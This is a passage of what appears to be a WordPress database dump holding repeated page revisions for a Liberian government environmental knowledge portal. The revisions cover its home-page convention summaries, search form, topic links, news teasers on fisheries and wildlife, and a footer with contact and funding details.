Fishermen Lost at Sea\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/nafaa-along-with-national-coast-guard-rescue-fishermen-lost-at-sea/\">NaFAA Along With National Coast Guard Rescue Fishermen Lost at...</a></h4>National Fisheries and Aquaculture Authority(NaFAA) in collaboration with the Liberia&hellip;\n	<a href=\"https://ekmsliberia.info/epa-technicians-carry-out-inventory-on-animal-welfare-at-libassa-wildlife-sanctuary-in-marshall-margibi-county/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/libassa.png\" alt=\"EPA Technicians Carry Out Inventory on Animal Welfare at Libassa Wildlife Sanctuary in Marshall, Margibi County\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/epa-technicians-carry-out-inventory-on-animal-welfare-at-libassa-wildlife-sanctuary-in-marshall-margibi-county/\">EPA Technicians Carry Out Inventory on Animal Welfare at Libassa...</a></h4>Technicians from the EPA headed by Hawa Walker, assistant manager&hellip;\n			<a href=\"https://ekmsliberia.info/news-and-blogs/\" role=\"button\">\n						Read All News & Blogs\n					</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2021-08-17 16:27:52','2021-08-17 16:27:52','',9,'https://ekmsliberia.info/?p=3936',0,'revision','',0),(3937,38,'2021-08-17 16:27:53','2021-08-17 16:27:53','Convention on Biological Diversity CBD is dedicated to promoting sustainable developmentRead MoreConvention on Climate ChangeThe ultimate objective of the Convention is to stabilize greenhouse gas concentrations \"at a level that would prevent dangerous anthropogenic (human induced) interference with the climate system.\"Read MoreConvention to Combat DesertificationA sole legally binding international agreement linking environment and development to sustainable land management.Read More				\n							Previous\n							Next\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\" target=\"\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:[&quot;document&quot;,&quot;institution&quot;,&quot;mea_resource&quot;,&quot;project_resource&quot;,&quot;related_topic&quot;],&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n							<input type=\"hidden\" value=\"document,institution,mea_resource,project_resource,related_topic\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"76\">Case Studies</option>\n	<option value=\"78\">Conventions</option>\n	<option value=\"79\">Factsheets</option>\n	<option value=\"161\">Guidelines</option>\n	<option value=\"82\">Leaflets</option>\n	<option value=\"84\">Newsletters</option>\n	<option value=\"85\">Policies</option>\n	<option value=\"225\">Presentations</option>\n	<option value=\"209\">Project Document</option>\n	<option value=\"86\">Reports</option>\n	<option value=\"178\">Research</option>\n	<option value=\"88\">Strategy and Action Plans</option>\n	<option value=\"89\">Toolkits</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n			<button>See all results</button>			\n			<h1>Select a Topic</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fas fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.</p>		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Document</h2>		\n		<p>Explore the EKMS Documents Database.</p>		\n			<a href=\"https://ekmsliberia.info/documents-database/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Latest News & Blogs</h1>		\n	<a href=\"https://ekmsliberia.info/liberias-grassroots-solar-energy-innovator/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/kehkeh.png\" alt=\"Liberia’s Grassroots Solar Energy Innovator\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/blog/\">Blog</a><h4><a href=\"https://ekmsliberia.info/liberias-grassroots-solar-energy-innovator/\">Liberia’s Grassroots Solar Energy Innovator</a></h4>Across the world, innovators from different sectors have invented devices,&hellip;\n	<a href=\"https://ekmsliberia.info/nafaa-fines-illegal-ivorian-fisherman-us5000-00/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/Untitled.png\" alt=\"NaFAA Fines Illegal Ivorian Fisherman US$5,000.00\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/nafaa-fines-illegal-ivorian-fisherman-us5000-00/\">NaFAA Fines Illegal Ivorian Fisherman US$5,000.00</a></h4>To deter illegal, unreported and unregulated (IUU) fishing across Liberia,&hellip;\n	<a href=\"https://ekmsliberia.info/nafaa-along-with-national-coast-guard-rescue-fishermen-lost-at-sea/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/nafaa.png\" alt=\"NaFAA Along With National Coast Guard Rescue Fishermen Lost at Sea\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/nafaa-along-with-national-coast-guard-rescue-fishermen-lost-at-sea/\">NaFAA Along With National Coast Guard Rescue Fishermen Lost at...</a></h4>National Fisheries and Aquaculture Authority(NaFAA) in collaboration with the Liberia&hellip;\n	<a href=\"https://ekmsliberia.info/epa-technicians-carry-out-inventory-on-animal-welfare-at-libassa-wildlife-sanctuary-in-marshall-margibi-county/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/libassa.png\" alt=\"EPA Technicians Carry Out Inventory on Animal Welfare at Libassa Wildlife Sanctuary in Marshall, Margibi County\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/epa-technicians-carry-out-inventory-on-animal-welfare-at-libassa-wildlife-sanctuary-in-marshall-margibi-county/\">EPA Technicians Carry Out Inventory on Animal Welfare at Libassa...</a></h4>Technicians from the EPA headed by Hawa Walker, assistant manager&hellip;\n			<a href=\"https://ekmsliberia.info/news-and-blogs/\" role=\"button\">\n						Read All News & Blogs\n					</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2021-08-17 16:27:53','2021-08-17 16:27:53','',9,'https://ekmsliberia.info/?p=3937',0,'revision','',0),(3938,38,'2021-08-17 16:27:53','2021-08-17 16:27:53','Convention on Biological Diversity CBD is dedicated to promoting sustainable developmentRead MoreConvention on Climate ChangeThe ultimate objective of the Convention is to stabilize greenhouse gas concentrations \"at a level that would prevent dangerous anthropogenic (human induced) interference with the climate system.\"Read MoreConvention to Combat DesertificationA sole legally binding international agreement linking environment and development to sustainable land management.Read More				\n							Previous\n							Next\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\" target=\"\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:[&quot;document&quot;,&quot;institution&quot;,&quot;mea_resource&quot;,&quot;project_resource&quot;,&quot;related_topic&quot;],&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n							<input type=\"hidden\" value=\"document,institution,mea_resource,project_resource,related_topic\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"76\">Case Studies</option>\n	<option value=\"78\">Conventions</option>\n	<option value=\"79\">Factsheets</option>\n	<option value=\"161\">Guidelines</option>\n	<option value=\"82\">Leaflets</option>\n	<option value=\"84\">Newsletters</option>\n	<option value=\"85\">Policies</option>\n	<option value=\"225\">Presentations</option>\n	<option value=\"209\">Project Document</option>\n	<option value=\"86\">Reports</option>\n	<option value=\"178\">Research</option>\n	<option value=\"88\">Strategy and Action Plans</option>\n	<option value=\"89\">Toolkits</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n			<button>See all results</button>			\n			<h1>Select a Topic</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fas fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.</p>		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Document</h2>		\n		<p>Explore the EKMS Documents Database.</p>		\n			<a href=\"https://ekmsliberia.info/documents-database/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Latest News & Blogs</h1>		\n	<a href=\"https://ekmsliberia.info/liberias-grassroots-solar-energy-innovator/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/kehkeh.png\" alt=\"Liberia’s Grassroots Solar Energy Innovator\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/blog/\">Blog</a><h4><a href=\"https://ekmsliberia.info/liberias-grassroots-solar-energy-innovator/\">Liberia’s Grassroots Solar Energy Innovator</a></h4>Across the world, innovators from different sectors have invented devices,&hellip;\n	<a href=\"https://ekmsliberia.info/nafaa-fines-illegal-ivorian-fisherman-us5000-00/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/Untitled.png\" alt=\"NaFAA Fines Illegal Ivorian Fisherman US$5,000.00\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/nafaa-fines-illegal-ivorian-fisherman-us5000-00/\">NaFAA Fines Illegal Ivorian Fisherman US$5,000.00</a></h4>To deter illegal, unreported and unregulated (IUU) fishing across Liberia,&hellip;\n	<a href=\"https://ekmsliberia.info/nafaa-along-with-national-coast-guard-rescue-fishermen-lost-at-sea/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/nafaa.png\" alt=\"NaFAA Along With National Coast Guard Rescue Fishermen Lost at Sea\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/nafaa-along-with-national-coast-guard-rescue-fishermen-lost-at-sea/\">NaFAA Along With National Coast Guard Rescue Fishermen Lost at...</a></h4>National Fisheries and Aquaculture Authority(NaFAA) in collaboration with the Liberia&hellip;\n	<a href=\"https://ekmsliberia.info/epa-technicians-carry-out-inventory-on-animal-welfare-at-libassa-wildlife-sanctuary-in-marshall-margibi-county/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/libassa.png\" alt=\"EPA Technicians Carry Out Inventory on Animal Welfare at Libassa Wildlife Sanctuary in Marshall, Margibi County\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/epa-technicians-carry-out-inventory-on-animal-welfare-at-libassa-wildlife-sanctuary-in-marshall-margibi-county/\">EPA Technicians Carry Out Inventory on Animal Welfare at Libassa...</a></h4>Technicians from the EPA headed by Hawa Walker, assistant manager&hellip;\n			<a href=\"https://ekmsliberia.info/news-and-blogs/\" role=\"button\">\n						Read All News & Blogs\n					</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2021-08-17 16:27:53','2021-08-17 16:27:53','',9,'https://ekmsliberia.info/?p=3938',0,'revision','',0),(3939,38,'2021-08-17 16:31:39','2021-08-17 16:31:39','Subscribe To Our Newsletter		\n			<a href=\"https://ekmsliberia.info/newsletter/\" role=\"button\">\n						Sign up now\n					</a>\n		Contribute to the EKMS<p>Are you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication? <a style=\"color: #ffffff; text-decoration: underline;\" href=\"#\">Join here!</a></p>This SiteContact		\n					<ul>\n							<li>\n										Address:<br>4th Street, Sinkor\n									</li>\n								<li>\n											<a href=\"mailto:contact@ekmsliberia.info\">\n										Email:<br>contact@ekmsliberia.info\n											</a>\n									</li>\n								<li>\n										Telephone:<br>+231775006254\n									</li>\n						</ul>\n													<a href=\"https://www.thegef.org\" target=\"_blank\" rel=\"noopener\">\n							<img src=\"https://ekmsliberia.infoliberia.info/wp-content/uploads/2021/08/gef_logo.jpg\" title=\"\" alt=\"\" />								</a>\n		This website was created and maintained with the financial support of the Global Environment Facility (GEF). Its contents are the sole responsibility of Environmental Protection Agency (EPA) and do not necessarily reflect the views of the Global Environment Facility.Follow us		\n					<a href=\"https://www.facebook.com/ekms.lib.7\" target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a href=\"https://twitter.com/EkmsLiberia\" target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a href=\"https://www.instagram.com/ekmsliberia/\" target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n		This is an Official Web Platform of the Liberian Government.','Site-footer','','inherit','closed','closed','','3805-revision-v1','','','2021-08-17 16:31:39','2021-08-17 16:31:39','',3805,'https://ekmsliberia.info/?p=3939',0,'revision','',0),(3940,38,'2021-08-17 16:32:52','2021-08-17 16:32:52','Subscribe To Our Newsletter		\n			<a href=\"https://ekmsliberia.info/newsletter/\" role=\"button\">\n						Sign up now\n					</a>\n		Contribute to the EKMS<p>Are you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication? <a style=\"color: #ffffff; text-decoration: underline;\" href=\"#\">Join here!</a></p>This SiteContact		\n					<ul>\n							<li>\n										Address:<br>4th Street, Sinkor\n									</li>\n								<li>\n											<a href=\"mailto:contact@ekmsliberia.info\">\n										Email:<br>contact@ekmsliberia.info\n											</a>\n									</li>\n								<li>\n										Telephone:<br>+231775006254\n									</li>\n						</ul>\n													<a href=\"https://www.thegef.org\" target=\"_blank\" rel=\"noopener\">\n							<img src=\"https://ekmsliberia.infoliberia.info/wp-content/uploads/2021/08/gef_logo.jpg\" title=\"\" alt=\"\" />								</a>\n		This website was created and maintained with the financial support of the Global Environment Facility (GEF). Its contents are the sole responsibility of Environmental Protection Agency (EPA) and do not necessarily reflect the views of the Global Environment Facility.Follow us		\n					<a href=\"https://www.facebook.com/ekms.lib.7\" target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a href=\"https://twitter.com/EkmsLiberia\" target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a href=\"https://www.instagram.com/ekmsliberia/\" target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n		This is an Official Web Platform of the Liberian Government.','Site-footer','','inherit','closed','closed','','3805-revision-v1','','','2021-08-17 16:32:52','2021-08-17 16:32:52','',3805,'https://ekmsliberia.info/?p=3940',0,'revision','',0),(3941,38,'2021-08-17 16:33:34','2021-08-17 16:33:34','Subscribe To Our Newsletter		\n			<a href=\"https://ekmsliberia.info/newsletter/\" role=\"button\">\n						Sign up now\n					</a>\n		Contribute to the EKMS<p>Are you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication? <a style=\"color: #ffffff; text-decoration: underline;\" href=\"#\">Join here!</a></p>This SiteContact		\n					<ul>\n							<li>\n										Address:<br>4th Street, Sinkor\n									</li>\n								<li>\n											<a href=\"mailto:contact@ekmsliberia.info\">\n										Email:<br>contact@ekmsliberia.info\n											</a>\n									</li>\n								<li>\n										Telephone:<br>+231775006254\n									</li>\n						</ul>\n													<a href=\"https://www.thegef.org\" target=\"_blank\" rel=\"noopener\">\n							<img src=\"https://ekmsliberia.infoliberia.info/wp-content/uploads/2021/08/gef_logo.jpg\" title=\"\" alt=\"\" />								</a>\n		This website was created and maintained with the financial support of the Global Environment Facility (GEF). Its contents are the sole responsibility of Environmental Protection Agency (EPA) and do not necessarily reflect the views of the Global Environment Facility.Follow us		\n					<a href=\"https://www.facebook.com/ekms.lib.7\" target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a href=\"https://twitter.com/EkmsLiberia\" target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a href=\"https://www.instagram.com/ekmsliberia/\" target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n		This is an Official Web Platform of the Liberian Government.','Site-footer','','inherit','closed','closed','','3805-revision-v1','','','2021-08-17 16:33:34','2021-08-17 16:33:34','',3805,'https://ekmsliberia.info/?p=3941',0,'revision','',0),(3942,38,'2021-08-17 16:34:53','2021-08-17 16:34:53','Subscribe To Our Newsletter		\n			<a href=\"https://ekmsliberia.info/newsletter/\" role=\"button\">\n						Sign up now\n					</a>\n		Contribute to the EKMS<p>Are you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication? <a style=\"color: #ffffff; text-decoration: underline;\" href=\"#\">Join here!</a></p>This SiteContact		\n					<ul>\n							<li>\n										Address:<br>4th Street, Sinkor\n									</li>\n								<li>\n											<a href=\"mailto:contact@ekmsliberia.info\">\n										Email:<br>contact@ekmsliberia.info\n											</a>\n									</li>\n								<li>\n										Telephone:<br>+231775006254\n									</li>\n						</ul>\n													<a href=\"https://www.thegef.org\" target=\"_blank\" rel=\"noopener\">\n							<img src=\"https://ekmsliberia.infoliberia.info/wp-content/uploads/2021/08/gef_logo.jpg\" title=\"\" alt=\"\" />								</a>\n		This website was created and maintained with the financial support of the Global Environment Facility (GEF). Its contents are the sole responsibility of Environmental Protection Agency (EPA) and do not necessarily reflect the views of the Global Environment Facility.Follow us		\n					<a href=\"https://www.facebook.com/ekms.lib.7\" target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a href=\"https://twitter.com/EkmsLiberia\" target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a href=\"https://www.instagram.com/ekmsliberia/\" target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n		This is an Official Web Platform of the Liberian Government.','Site-footer','','inherit','closed','closed','','3805-revision-v1','','','2021-08-17 16:34:53','2021-08-17 16:34:53','',3805,'https://ekmsliberia.info/?p=3942',0,'revision','',0),(3943,38,'2021-08-17 17:33:53','2021-08-17 17:33:53','Subscribe To Our Newsletter		\n			<a href=\"https://ekmsliberia.info/newsletter/\" role=\"button\">\n						Sign up now\n					</a>\n		Contribute to the EKMS<p>Are you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication? <a style=\"color: #ffffff; text-decoration: underline;\" href=\"#\">Join here!</a></p>This SiteContact		\n					<ul>\n							<li>\n										Address:<br>4th Street, Sinkor\n									</li>\n								<li>\n											<a href=\"mailto:contact@ekmsliberia.info\">\n										Email:<br>contact@ekmsliberia.info\n											</a>\n									</li>\n								<li>\n										Telephone:<br>+231775006254\n									</li>\n						</ul>\n													<a href=\"https://www.thegef.org\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.infoliberia.info/wp-content/uploads/2021/08/gef_logo.jpg\" title=\"\" alt=\"\" />								</a>\n		This website was created and maintained with the financial support of the Global Environment Facility (GEF). Its contents are the sole responsibility of Environmental Protection Agency (EPA) and do not necessarily reflect the views of the Global Environment Facility.Follow us		\n					<a href=\"https://www.facebook.com/ekms.lib.7\" target=\"_blank\" rel=\"noopener noreferrer\">\n						Facebook\n											</a>\n					<a href=\"https://twitter.com/EkmsLiberia\" target=\"_blank\" rel=\"noopener noreferrer\">\n						Twitter\n											</a>\n					<a href=\"https://www.instagram.com/ekmsliberia/\" target=\"_blank\" rel=\"noopener noreferrer\">\n						Instagram\n											</a>\n		This is an Official Web Platform of the Liberian Government.','Site-footer','','inherit','closed','closed','','3805-revision-v1','','','2021-08-17 17:33:53','2021-08-17 17:33:53','',3805,'https://ekmsliberia.info/3805-revision-v1/',0,'revision','',0),(3944,38,'2021-08-17 17:33:53','2021-08-17 17:33:53','Subscribe To Our Newsletter		\n			<a href=\"https://ekmsliberia.info/newsletter/\" role=\"button\">\n						Sign up now\n					</a>\n		Contribute to the EKMS<p>Are you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication? <a style=\"color: #ffffff; text-decoration: underline;\" href=\"#\">Join here!</a></p>This SiteContact		\n					<ul>\n							<li>\n										Address:<br>4th Street, Sinkor\n									</li>\n								<li>\n											<a href=\"mailto:contact@ekmsliberia.info\">\n										Email:<br>contact@ekmsliberia.info\n											</a>\n									</li>\n								<li>\n										Telephone:<br>+231775006254\n									</li>\n						</ul>\n													<a href=\"https://www.thegef.org\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img width=\"600\" height=\"600\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/gef_logo.png\" alt=\"\" loading=\"lazy\" />								</a>\n		This website was created and maintained with the financial support of the Global Environment Facility (GEF). Its contents are the sole responsibility of Environmental Protection Agency (EPA) and do not necessarily reflect the views of the Global Environment Facility.Follow us		\n					<a href=\"https://www.facebook.com/ekms.lib.7\" target=\"_blank\" rel=\"noopener noreferrer\">\n						Facebook\n											</a>\n					<a href=\"https://twitter.com/EkmsLiberia\" target=\"_blank\" rel=\"noopener noreferrer\">\n						Twitter\n											</a>\n					<a href=\"https://www.instagram.com/ekmsliberia/\" target=\"_blank\" rel=\"noopener noreferrer\">\n						Instagram\n											</a>\n		This is an Official Web Platform of the Liberian Government.','Site-footer','','inherit','closed','closed','','3805-revision-v1','','','2021-08-17 17:33:53','2021-08-17 17:33:53','',3805,'https://ekmsliberia.info/3805-revision-v1/',0,'revision','',0),(3945,38,'2021-08-17 17:34:53','2021-08-17 17:34:53','Subscribe To Our Newsletter		\n			<a href=\"https://ekmsliberia.info/newsletter/\" role=\"button\">\n						Sign up now\n					</a>\n		Contribute to the EKMSAre you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication? <a style=\"color: #ffffff; text-decoration: underline;\" href=\"https://ekmsliberia.info/join-the-community/\">Join here!</a>This SiteContact		\n					<ul>\n							<li>\n										Address:<br>4th Street, Sinkor\n									</li>\n								<li>\n											<a href=\"mailto:contact@ekmsliberia.info\">\n										Email:<br>contact@ekmsliberia.info\n											</a>\n									</li>\n								<li>\n										Telephone:<br>+231775006254\n									</li>\n						</ul>\n													<a href=\"https://www.thegef.org\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img width=\"600\" height=\"600\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/gef_logo.png\" alt=\"\" loading=\"lazy\" />								</a>\n		This website was created and maintained with the financial support of the Global Environment Facility (GEF). Its contents are the sole responsibility of Environmental Protection Agency (EPA) and do not necessarily reflect the views of the Global Environment Facility.Follow us		\n					<a href=\"https://www.facebook.com/ekms.lib.7\" target=\"_blank\" rel=\"noopener noreferrer\">\n						Facebook\n											</a>\n					<a href=\"https://twitter.com/EkmsLiberia\" target=\"_blank\" rel=\"noopener noreferrer\">\n						Twitter\n											</a>\n					<a href=\"https://www.instagram.com/ekmsliberia/\" target=\"_blank\" rel=\"noopener noreferrer\">\n						Instagram\n											</a>\n		This is an Official Web Platform of the Liberian Government.','Site-footer','','inherit','closed','closed','','3805-revision-v1','','','2021-08-17 17:34:53','2021-08-17 17:34:53','',3805,'https://ekmsliberia.info/3805-revision-v1/',0,'revision','',0),(3947,38,'2021-08-17 17:40:31','2021-08-17 17:40:31','Convention on Biological Diversity CBD is dedicated to promoting sustainable developmentRead MoreConvention on Climate ChangeThe ultimate objective of the Convention is to stabilize greenhouse gas concentrations \"at a level that would prevent dangerous anthropogenic (human induced) interference with the climate system.\"Read MoreConvention to Combat DesertificationA sole legally binding international agreement linking environment and development to sustainable land management.Read More				\n							Previous\n							Next\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\" target=\"\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:[&quot;document&quot;,&quot;institution&quot;,&quot;mea_resource&quot;,&quot;project_resource&quot;,&quot;related_topic&quot;],&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n							<input type=\"hidden\" value=\"document,institution,mea_resource,project_resource,related_topic\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"76\">Case Studies</option>\n	<option value=\"78\">Conventions</option>\n	<option value=\"79\">Factsheets</option>\n	<option value=\"161\">Guidelines</option>\n	<option value=\"82\">Leaflets</option>\n	<option value=\"84\">Newsletters</option>\n	<option value=\"85\">Policies</option>\n	<option value=\"225\">Presentations</option>\n	<option value=\"209\">Project Document</option>\n	<option value=\"86\">Reports</option>\n	<option value=\"178\">Research</option>\n	<option value=\"88\">Strategy and Action Plans</option>\n	<option value=\"89\">Toolkits</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n			<button>See all results</button>			\n			<h1>Select a Topic</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fas fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.</p>		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Document</h2>		\n		<p>Explore the EKMS Documents Database.</p>		\n			<a href=\"https://ekmsliberia.info/documents-database/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Latest News & Blogs</h1>		\n	<a href=\"https://ekmsliberia.info/liberias-grassroots-solar-energy-innovator/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/kehkeh.png\" alt=\"Liberia’s Grassroots Solar Energy Innovator\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/blog/\">Blog</a><h4><a href=\"https://ekmsliberia.info/liberias-grassroots-solar-energy-innovator/\">Liberia’s Grassroots Solar Energy Innovator</a></h4>Across the world, innovators from different sectors have invented devices,&hellip;\n	<a href=\"https://ekmsliberia.info/nafaa-fines-illegal-ivorian-fisherman-us5000-00/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/Untitled.png\" alt=\"NaFAA Fines Illegal Ivorian Fisherman US$5,000.00\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a 